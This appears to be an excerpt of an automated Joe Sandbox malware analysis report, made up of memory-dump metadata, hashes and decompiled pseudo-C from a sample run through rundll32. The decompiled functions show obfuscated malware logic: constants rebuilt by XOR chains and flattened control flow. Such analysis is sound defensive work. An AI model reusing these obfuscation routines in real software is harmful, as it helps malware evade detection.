                                                                                                                      			}

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -$A_`>$piC$z$z
                                                                                                                      • API String ID: 0-2268621895
                                                                                                                      • Opcode ID: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction ID: de17437e19b8a6c836c9f328e18ae2ec46b72c7160ece8613b9e8402c68cca9f
                                                                                                                      • Opcode Fuzzy Hash: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction Fuzzy Hash: 73413AB29093029FC344DF25D58940BFBE2FBD4758F419A2DF49996250D774CA0A8F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                      • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                      • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                      • SendMessageA.USER32 ref: 1001B48B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: State$LongMessageSendWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1063413437-0
                                                                                                                      • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                      • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00171F9B(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                      				char _v32;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				char* _v56;
                                                                                                                      				intOrPtr _v60;
                                                                                                                      				intOrPtr _v64;
                                                                                                                      				char _v68;
                                                                                                                      				char _v76;
                                                                                                                      				intOrPtr _v80;
                                                                                                                      				char _v84;
                                                                                                                      				intOrPtr _v88;
                                                                                                                      				intOrPtr _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				intOrPtr _t419;
                                                                                                                      				void* _t424;
                                                                                                                      				void* _t432;
                                                                                                                      				signed int _t435;
                                                                                                                      				void* _t444;
                                                                                                                      				intOrPtr* _t446;
                                                                                                                      				void* _t448;
                                                                                                                      				signed char* _t458;
                                                                                                                      				signed char* _t493;
                                                                                                                      				intOrPtr* _t498;
                                                                                                                      				intOrPtr _t499;
                                                                                                                      				intOrPtr _t500;
                                                                                                                      				void* _t501;
                                                                                                                      				signed char* _t502;
                                                                                                                      				signed int _t504;
                                                                                                                      				signed int _t505;
                                                                                                                      				signed int _t506;
                                                                                                                      				signed int _t507;
                                                                                                                      				signed int _t508;
                                                                                                                      				signed int _t509;
                                                                                                                      				signed int _t510;
                                                                                                                      				signed int _t511;
                                                                                                                      				signed int _t512;
                                                                                                                      				intOrPtr _t513;
                                                                                                                      				void* _t514;
                                                                                                                      				void* _t515;
                                                                                                                      				void* _t519;
                                                                                                                      
                                                                                                                      				_t498 = _a20;
                                                                                                                      				_t446 = __edx;
                                                                                                                      				_push(_t498);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(_a12);
                                                                                                                      				_v88 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(__ecx);
                                                                                                                      				_v236 = 0xf0db43;
                                                                                                                      				_t515 = _t514 + 0x1c;
                                                                                                                      				_v236 = _v236 + 0xffff6527;
                                                                                                                      				_v236 = _v236 ^ 0x37601acd;
                                                                                                                      				_t499 = 0;
                                                                                                                      				_v236 = _v236 >> 1;
                                                                                                                      				_t448 = 0xb503f3;
                                                                                                                      				_v236 = _v236 ^ 0x1bc82d53;
                                                                                                                      				_v140 = 0x2172ad;
                                                                                                                      				_v140 = _v140 + 0x5f16;
                                                                                                                      				_v140 = _v140 ^ 0x0021d183;
                                                                                                                      				_v124 = 0x27fcb3;
                                                                                                                      				_t504 = 0x21;
                                                                                                                      				_v124 = _v124 / _t504;
                                                                                                                      				_v124 = _v124 ^ 0x00013673;
                                                                                                                      				_v108 = 0x51f448;
                                                                                                                      				_t505 = 0x49;
                                                                                                                      				_v92 = 0;
                                                                                                                      				_v108 = _v108 * 0x2f;
                                                                                                                      				_v108 = _v108 ^ 0x0f088890;
                                                                                                                      				_v212 = 0xcc9eac;
                                                                                                                      				_v212 = _v212 + 0xffffe9a6;
                                                                                                                      				_v212 = _v212 / _t505;
                                                                                                                      				_v212 = _v212 + 0xffffa822;
                                                                                                                      				_v212 = _v212 ^ 0x000711be;
                                                                                                                      				_v220 = 0xbaa1b0;
                                                                                                                      				_t506 = 0x3a;
                                                                                                                      				_v220 = _v220 * 0x1b;
                                                                                                                      				_v220 = _v220 * 0x49;
                                                                                                                      				_v220 = _v220 << 0xd;
                                                                                                                      				_v220 = _v220 ^ 0x5bc66ad4;
                                                                                                                      				_v96 = 0x96051c;
                                                                                                                      				_v96 = _v96 * 0x64;
                                                                                                                      				_v96 = _v96 ^ 0x3a9f1857;
                                                                                                                      				_v144 = 0x7390a9;
                                                                                                                      				_v144 = _v144 + 0xe6fa;
                                                                                                                      				_v144 = _v144 ^ 0x007f1cdd;
                                                                                                                      				_v196 = 0xf57225;
                                                                                                                      				_v196 = _v196 >> 0xe;
                                                                                                                      				_v196 = _v196 + 0xffff98f0;
                                                                                                                      				_v196 = _v196 ^ 0x2c45e12b;
                                                                                                                      				_v196 = _v196 ^ 0xd3b3c009;
                                                                                                                      				_v204 = 0xadefc1;
                                                                                                                      				_v204 = _v204 >> 4;
                                                                                                                      				_v204 = _v204 | 0xb7bea7b8;
                                                                                                                      				_v204 = _v204 / _t506;
                                                                                                                      				_v204 = _v204 ^ 0x03274dc6;
                                                                                                                      				_v224 = 0x9d9cb1;
                                                                                                                      				_v224 = _v224 + 0xffffa27a;
                                                                                                                      				_v224 = _v224 + 0xffffee01;
                                                                                                                      				_v224 = _v224 + 0xffff764e;
                                                                                                                      				_v224 = _v224 ^ 0x0095b081;
                                                                                                                      				_v192 = 0x5eb987;
                                                                                                                      				_v192 = _v192 + 0xffff1159;
                                                                                                                      				_t507 = 0xe;
                                                                                                                      				_v192 = _v192 * 0x23;
                                                                                                                      				_v192 = _v192 + 0xffff653a;
                                                                                                                      				_v192 = _v192 ^ 0x0cdf46f4;
                                                                                                                      				_v104 = 0x141020;
                                                                                                                      				_v104 = _v104 << 6;
                                                                                                                      				_v104 = _v104 ^ 0x0502b476;
                                                                                                                      				_v168 = 0xc57d6d;
                                                                                                                      				_v168 = _v168 / _t507;
                                                                                                                      				_v168 = _v168 | 0x88578591;
                                                                                                                      				_v168 = _v168 ^ 0x8850307a;
                                                                                                                      				_v120 = 0x64bf72;
                                                                                                                      				_v120 = _v120 << 0xf;
                                                                                                                      				_v120 = _v120 ^ 0x5fbc8f9f;
                                                                                                                      				_v128 = 0xd63e1a;
                                                                                                                      				_v128 = _v128 + 0xffff0b7c;
                                                                                                                      				_v128 = _v128 ^ 0x00df6f35;
                                                                                                                      				_v136 = 0xd9491f;
                                                                                                                      				_v136 = _v136 + 0xffff8a09;
                                                                                                                      				_v136 = _v136 ^ 0x00d088a2;
                                                                                                                      				_v112 = 0xceb298;
                                                                                                                      				_v112 = _v112 + 0x36cc;
                                                                                                                      				_v112 = _v112 ^ 0x00c43f46;
                                                                                                                      				_v132 = 0x9f966b;
                                                                                                                      				_v132 = _v132 + 0xd61c;
                                                                                                                      				_v132 = _v132 ^ 0x00a3d2ff;
                                                                                                                      				_v216 = 0x70daad;
                                                                                                                      				_v216 = _v216 ^ 0xde964b68;
                                                                                                                      				_t508 = 0x3f;
                                                                                                                      				_v216 = _v216 * 0x49;
                                                                                                                      				_v216 = _v216 | 0xd3ab0205;
                                                                                                                      				_v216 = _v216 ^ 0xdfb04ca5;
                                                                                                                      				_v200 = 0xe4f811;
                                                                                                                      				_v200 = _v200 + 0xffffdd8f;
                                                                                                                      				_v200 = _v200 | 0x8a8b7b9c;
                                                                                                                      				_v200 = _v200 + 0xb2a2;
                                                                                                                      				_v200 = _v200 ^ 0x8af46931;
                                                                                                                      				_v244 = 0x65145a;
                                                                                                                      				_v244 = _v244 >> 4;
                                                                                                                      				_v244 = _v244 + 0x823b;
                                                                                                                      				_v244 = _v244 / _t508;
                                                                                                                      				_v244 = _v244 ^ 0x000ba257;
                                                                                                                      				_v184 = 0x53b52d;
                                                                                                                      				_v184 = _v184 >> 0xd;
                                                                                                                      				_v184 = _v184 | 0x3ab2fca7;
                                                                                                                      				_v184 = _v184 >> 0xa;
                                                                                                                      				_v184 = _v184 ^ 0x00013efe;
                                                                                                                      				_v176 = 0x3e1c9c;
                                                                                                                      				_v176 = _v176 * 0x3f;
                                                                                                                      				_v176 = _v176 * 0x61;
                                                                                                                      				_v176 = _v176 ^ 0xcaa54878;
                                                                                                                      				_v172 = 0xb8475b;
                                                                                                                      				_v172 = _v172 >> 2;
                                                                                                                      				_v172 = _v172 + 0xffff45a9;
                                                                                                                      				_v172 = _v172 ^ 0x002df2ce;
                                                                                                                      				_v148 = 0x11eadc;
                                                                                                                      				_v148 = _v148 * 0x2c;
                                                                                                                      				_v148 = _v148 ^ 0x0312b4e7;
                                                                                                                      				_v228 = 0xd45ea;
                                                                                                                      				_v228 = _v228 + 0x1c9a;
                                                                                                                      				_v228 = _v228 ^ 0x843ee8f1;
                                                                                                                      				_v228 = _v228 + 0xffff47b4;
                                                                                                                      				_v228 = _v228 ^ 0x843da11a;
                                                                                                                      				_v116 = 0x7a0457;
                                                                                                                      				_t509 = 0x4d;
                                                                                                                      				_v116 = _v116 / _t509;
                                                                                                                      				_v116 = _v116 ^ 0x00002c66;
                                                                                                                      				_v232 = 0x7f0d8a;
                                                                                                                      				_v232 = _v232 + 0xa3a9;
                                                                                                                      				_v232 = _v232 + 0xf9ff;
                                                                                                                      				_v232 = _v232 >> 1;
                                                                                                                      				_v232 = _v232 ^ 0x0040e313;
                                                                                                                      				_v208 = 0x135f21;
                                                                                                                      				_v208 = _v208 | 0x41f85818;
                                                                                                                      				_t510 = 0x60;
                                                                                                                      				_v208 = _v208 * 0x65;
                                                                                                                      				_v208 = _v208 << 0xe;
                                                                                                                      				_v208 = _v208 ^ 0x245ebba3;
                                                                                                                      				_v240 = 0x80e1e4;
                                                                                                                      				_v240 = _v240 + 0x9e19;
                                                                                                                      				_v240 = _v240 * 0x1d;
                                                                                                                      				_v240 = _v240 + 0xa9b2;
                                                                                                                      				_v240 = _v240 ^ 0x0eacf51a;
                                                                                                                      				_v100 = 0x156d59;
                                                                                                                      				_v100 = _v100 + 0x8f40;
                                                                                                                      				_v100 = _v100 ^ 0x001bd2c0;
                                                                                                                      				_v152 = 0x95953b;
                                                                                                                      				_v152 = _v152 >> 7;
                                                                                                                      				_v152 = _v152 / _t510;
                                                                                                                      				_v152 = _v152 ^ 0x000ebfd6;
                                                                                                                      				_v180 = 0x897e25;
                                                                                                                      				_v180 = _v180 | 0x70565201;
                                                                                                                      				_t511 = 0x75;
                                                                                                                      				_v180 = _v180 / _t511;
                                                                                                                      				_v180 = _v180 << 0xd;
                                                                                                                      				_v180 = _v180 ^ 0xdf07d45f;
                                                                                                                      				_v160 = 0x7982fe;
                                                                                                                      				_t512 = 0x32;
                                                                                                                      				_t513 = _v88;
                                                                                                                      				_v160 = _v160 / _t512;
                                                                                                                      				_v160 = _v160 << 0xd;
                                                                                                                      				_v160 = _v160 ^ 0x4dcbb71a;
                                                                                                                      				_v188 = 0x3ea9a3;
                                                                                                                      				_v188 = _v188 >> 2;
                                                                                                                      				_v188 = _v188 * 0x4a;
                                                                                                                      				_v188 = _v188 * 0x27;
                                                                                                                      				_v188 = _v188 ^ 0xb0903fbe;
                                                                                                                      				_v164 = 0x944a5b;
                                                                                                                      				_v164 = _v164 << 9;
                                                                                                                      				_v164 = _v164 * 0x65;
                                                                                                                      				_v164 = _v164 ^ 0x02abce10;
                                                                                                                      				_v156 = 0x59a8bb;
                                                                                                                      				_v156 = _v156 >> 0xb;
                                                                                                                      				_v156 = _v156 + 0x17fc;
                                                                                                                      				_v156 = _v156 ^ 0x000023b1;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t519 = _t448 - 0x5a88f65;
                                                                                                                      						if(_t519 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t519 == 0) {
                                                                                                                      							_t500 =  *_t446;
                                                                                                                      							E0018FA99(_v112, _v132, _v216, _v200, _t500);
                                                                                                                      							_t501 = _t500 + _v124;
                                                                                                                      							E0018FD29(_v84, _v244, _t501, _v184, _v80);
                                                                                                                      							_t502 = _t501 + _v80;
                                                                                                                      							_push(_v148);
                                                                                                                      							_push(_v172);
                                                                                                                      							_push(_t513);
                                                                                                                      							E00175894(_t502, _v176);
                                                                                                                      							_t493 =  &(_t502[_t513]);
                                                                                                                      							_t515 = _t515 + 0x24;
                                                                                                                      							_t458 = _t502;
                                                                                                                      							if(_t502 >= _t493) {
                                                                                                                      								L15:
                                                                                                                      								_t432 = E0017EF71(0, 0xe);
                                                                                                                      								_t448 = 0x44ef61d;
                                                                                                                      								 *((char*)(_t432 + _t502)) = 0;
                                                                                                                      								_t499 = _v92;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								goto L12;
                                                                                                                      							}
                                                                                                                      							do {
                                                                                                                      								L12:
                                                                                                                      								if(( *_t458 & 0x000000ff) == _v236) {
                                                                                                                      									 *_t458 = 0xc3;
                                                                                                                      								}
                                                                                                                      								_t458 =  &(_t458[1]);
                                                                                                                      							} while (_t458 < _t493);
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						if(_t448 == 0xb503f3) {
                                                                                                                      							_t448 = 0xf32de15;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t448 == 0x231aa40) {
                                                                                                                      							_t435 = E001845CD(_v192,  &_v76,  &_v84);
                                                                                                                      							asm("sbb ecx, ecx");
                                                                                                                      							_t448 = ( ~_t435 & 0xfac85eed) + 0xa894c28;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t448 == 0x44ef61d) {
                                                                                                                      							E001768DE(_v232, _v208, _v240, _v100, _v84);
                                                                                                                      							_t515 = _t515 + 0xc;
                                                                                                                      							_t448 = 0xa894c28;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t448 != 0x551ab15) {
                                                                                                                      							goto L28;
                                                                                                                      						}
                                                                                                                      						_t513 = E0017EF71(_v164, _v156);
                                                                                                                      						_t448 = 0xb847f8c;
                                                                                                                      						 *((intOrPtr*)(_t446 + 4)) = _v140 + _v80 + _t513;
                                                                                                                      					}
                                                                                                                      					if(_t448 == 0xa894c28) {
                                                                                                                      						E001768DE(_v152, _v180, _v160, _v188, _v76);
                                                                                                                      						_t515 = _t515 + 0xc;
                                                                                                                      						_t448 = 0x47d0478;
                                                                                                                      						goto L28;
                                                                                                                      					}
                                                                                                                      					if(_t448 == 0xb847f8c) {
                                                                                                                      						_push(_t448);
                                                                                                                      						_push(_t448);
                                                                                                                      						_t419 = E00183512( *((intOrPtr*)(_t446 + 4)));
                                                                                                                      						 *_t446 = _t419;
                                                                                                                      						if(_t419 == 0) {
                                                                                                                      							_t448 = 0x44ef61d;
                                                                                                                      						} else {
                                                                                                                      							_t448 = 0x5a88f65;
                                                                                                                      							_t499 = 1;
                                                                                                                      							_v92 = 1;
                                                                                                                      						}
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(_t448 == 0xe73b6d2) {
                                                                                                                      						_v48 = _v88;
                                                                                                                      						_v52 = 0x20;
                                                                                                                      						_v56 =  &_v32;
                                                                                                                      						_v64 =  *_t498;
                                                                                                                      						_v60 =  *((intOrPtr*)(_t498 + 4));
                                                                                                                      						_t424 = E0018FF31( &_v76,  &_v68, _v144, _v196, _v204);
                                                                                                                      						_t515 = _t515 + 0xc;
                                                                                                                      						if(_t424 == 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						_t448 = 0x231aa40;
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					if(_t448 != 0xf32de15) {
                                                                                                                      						goto L28;
                                                                                                                      					}
                                                                                                                      					_push( *_t498);
                                                                                                                      					_t444 = E00181831(_v212, _v220,  &_v32, _v96, _t448,  *((intOrPtr*)(_t498 + 4)));
                                                                                                                      					_t515 = _t515 + 0x18;
                                                                                                                      					if(_t444 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					_t448 = 0xe73b6d2;
                                                                                                                      					goto L1;
                                                                                                                      					L28:
                                                                                                                      				} while (_t448 != 0x47d0478);
                                                                                                                      				return _t499;
                                                                                                                      			}
                                                                                                                      0x001720e6
                                                                                                                      0x001720ed
                                                                                                                      0x001720f8
                                                                                                                      0x00172100
                                                                                                                      0x00172108
                                                                                                                      0x00172110
                                                                                                                      0x00172118
                                                                                                                      0x0017211d
                                                                                                                      0x00172125
                                                                                                                      0x0017212d
                                                                                                                      0x00172135
                                                                                                                      0x0017213d
                                                                                                                      0x00172142
                                                                                                                      0x00172150
                                                                                                                      0x00172154
                                                                                                                      0x0017215c
                                                                                                                      0x00172164
                                                                                                                      0x0017216c
                                                                                                                      0x00172176
                                                                                                                      0x0017217e
                                                                                                                      0x00172186
                                                                                                                      0x0017218e
                                                                                                                      0x0017219d
                                                                                                                      0x001721a0
                                                                                                                      0x001721a4
                                                                                                                      0x001721ac
                                                                                                                      0x001721b4
                                                                                                                      0x001721bf
                                                                                                                      0x001721c7
                                                                                                                      0x001721d2
                                                                                                                      0x001721e2
                                                                                                                      0x001721e6
                                                                                                                      0x001721ee
                                                                                                                      0x001721f6
                                                                                                                      0x00172201
                                                                                                                      0x00172209
                                                                                                                      0x00172214
                                                                                                                      0x0017221f
                                                                                                                      0x0017222a
                                                                                                                      0x00172235
                                                                                                                      0x00172240
                                                                                                                      0x0017224b
                                                                                                                      0x00172256
                                                                                                                      0x00172261
                                                                                                                      0x0017226c
                                                                                                                      0x00172277
                                                                                                                      0x00172282
                                                                                                                      0x0017228d
                                                                                                                      0x00172298
                                                                                                                      0x001722a0
                                                                                                                      0x001722ad
                                                                                                                      0x001722ae
                                                                                                                      0x001722b2
                                                                                                                      0x001722ba
                                                                                                                      0x001722c2
                                                                                                                      0x001722ca
                                                                                                                      0x001722d2
                                                                                                                      0x001722da
                                                                                                                      0x001722e2
                                                                                                                      0x001722ea
                                                                                                                      0x001722f2
                                                                                                                      0x001722f7
                                                                                                                      0x00172305
                                                                                                                      0x00172309
                                                                                                                      0x00172311
                                                                                                                      0x00172319
                                                                                                                      0x0017231e
                                                                                                                      0x00172326
                                                                                                                      0x0017232b
                                                                                                                      0x00172333
                                                                                                                      0x00172340
                                                                                                                      0x00172349
                                                                                                                      0x0017234d
                                                                                                                      0x00172355
                                                                                                                      0x0017235d
                                                                                                                      0x00172362
                                                                                                                      0x0017236a
                                                                                                                      0x00172372
                                                                                                                      0x0017237f
                                                                                                                      0x00172383
                                                                                                                      0x0017238b
                                                                                                                      0x00172393
                                                                                                                      0x0017239b
                                                                                                                      0x001723a3
                                                                                                                      0x001723ab
                                                                                                                      0x001723b3
                                                                                                                      0x001723c9
                                                                                                                      0x001723ce
                                                                                                                      0x001723d7
                                                                                                                      0x001723e2
                                                                                                                      0x001723ea
                                                                                                                      0x001723f2
                                                                                                                      0x001723fa
                                                                                                                      0x001723fe
                                                                                                                      0x00172406
                                                                                                                      0x0017240e
                                                                                                                      0x0017241b
                                                                                                                      0x0017241e
                                                                                                                      0x00172422
                                                                                                                      0x00172427
                                                                                                                      0x0017242f
                                                                                                                      0x00172437
                                                                                                                      0x00172444
                                                                                                                      0x00172448
                                                                                                                      0x00172450
                                                                                                                      0x00172458
                                                                                                                      0x00172463
                                                                                                                      0x0017246e
                                                                                                                      0x00172479
                                                                                                                      0x00172481
                                                                                                                      0x0017248e
                                                                                                                      0x00172492
                                                                                                                      0x0017249a
                                                                                                                      0x001724a2
                                                                                                                      0x001724ae
                                                                                                                      0x001724b3
                                                                                                                      0x001724b9
                                                                                                                      0x001724be
                                                                                                                      0x001724c6
                                                                                                                      0x001724d2
                                                                                                                      0x001724d5
                                                                                                                      0x001724dc
                                                                                                                      0x001724e0
                                                                                                                      0x001724e5
                                                                                                                      0x001724ed
                                                                                                                      0x001724f5
                                                                                                                      0x001724ff
                                                                                                                      0x00172508
                                                                                                                      0x0017250c
                                                                                                                      0x00172514
                                                                                                                      0x0017251c
                                                                                                                      0x00172526
                                                                                                                      0x0017252a
                                                                                                                      0x00172532
                                                                                                                      0x0017253a
                                                                                                                      0x0017253f
                                                                                                                      0x00172547
                                                                                                                      0x00172547
                                                                                                                      0x0017254f
                                                                                                                      0x0017254f
                                                                                                                      0x0017254f
                                                                                                                      0x0017254f
                                                                                                                      0x00172555
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017255b
                                                                                                                      0x0017262b
                                                                                                                      0x00172644
                                                                                                                      0x00172653
                                                                                                                      0x0017266c
                                                                                                                      0x00172671
                                                                                                                      0x0017267d
                                                                                                                      0x00172681
                                                                                                                      0x00172689
                                                                                                                      0x0017268a
                                                                                                                      0x0017268f
                                                                                                                      0x00172692
                                                                                                                      0x00172695
                                                                                                                      0x00172699
                                                                                                                      0x001726ac
                                                                                                                      0x001726bb
                                                                                                                      0x001726c2
                                                                                                                      0x001726c7
                                                                                                                      0x001726cb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0017269b
                                                                                                                      0x0017269b
                                                                                                                      0x001726a2
                                                                                                                      0x001726a4
                                                                                                                      0x001726a4
                                                                                                                      0x001726a7
                                                                                                                      0x001726a8
                                                                                                                      0x00000000
                                                                                                                      0x0017269b
                                                                                                                      0x00172567
                                                                                                                      0x00172621
                                                                                                                      0x00000000
                                                                                                                      0x00172621
                                                                                                                      0x00172573
                                                                                                                      0x00172603
                                                                                                                      0x0017260e
                                                                                                                      0x00172616
                                                                                                                      0x00000000
                                                                                                                      0x00172616
                                                                                                                      0x0017257b
                                                                                                                      0x001725d9
                                                                                                                      0x001725de
                                                                                                                      0x001725e1
                                                                                                                      0x00000000
                                                                                                                      0x001725e1
                                                                                                                      0x00172583
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001725a1
                                                                                                                      0x001725b5
                                                                                                                      0x001725ba
                                                                                                                      0x001725ba
                                                                                                                      0x001726dd
                                                                                                                      0x0017280a
                                                                                                                      0x0017280f
                                                                                                                      0x00172812
                                                                                                                      0x00000000
                                                                                                                      0x00172812
                                                                                                                      0x001726e9
                                                                                                                      0x001727c3
                                                                                                                      0x001727c4
                                                                                                                      0x001727c8
                                                                                                                      0x001727cd
                                                                                                                      0x001727d3
                                                                                                                      0x001727e9
                                                                                                                      0x001727d5
                                                                                                                      0x001727d7
                                                                                                                      0x001727dc
                                                                                                                      0x001727dd

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $+E,$f,$E
                                                                                                                      • API String ID: 0-1056989491
                                                                                                                      • Opcode ID: f924d05836e70ef0a09e8ac1d4695ea004385d1c302f03348df483147d80d69e
                                                                                                                      • Instruction ID: 32ccebc9dcd7c96e2b6efd26274e6553c4be1a93de4061e9cc5f1e587d001e0a
                                                                                                                      • Opcode Fuzzy Hash: f924d05836e70ef0a09e8ac1d4695ea004385d1c302f03348df483147d80d69e
                                                                                                                      • Instruction Fuzzy Hash: 652210715083809FD368CF25C58AA9BFBF1FBD5708F10891DE6998A260D7B19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0018CC89(intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                      				char _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t283;
                                                                                                                      				intOrPtr _t315;
                                                                                                                      				void* _t316;
                                                                                                                      				intOrPtr _t320;
                                                                                                                      				intOrPtr _t324;
                                                                                                                      				void* _t325;
                                                                                                                      				intOrPtr* _t328;
                                                                                                                      				void* _t330;
                                                                                                                      				void* _t365;
                                                                                                                      				signed int _t368;
                                                                                                                      				signed int _t369;
                                                                                                                      				signed int _t370;
                                                                                                                      				signed int _t371;
                                                                                                                      				signed int _t372;
                                                                                                                      				signed int _t373;
                                                                                                                      				signed int _t374;
                                                                                                                      				signed int _t375;
                                                                                                                      				signed int _t376;
                                                                                                                      				signed int _t377;
                                                                                                                      				signed int _t378;
                                                                                                                      				signed int* _t381;
                                                                                                                      
                                                                                                                      				_t367 = _a4;
                                                                                                                      				_t328 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E0017CF25(_t283);
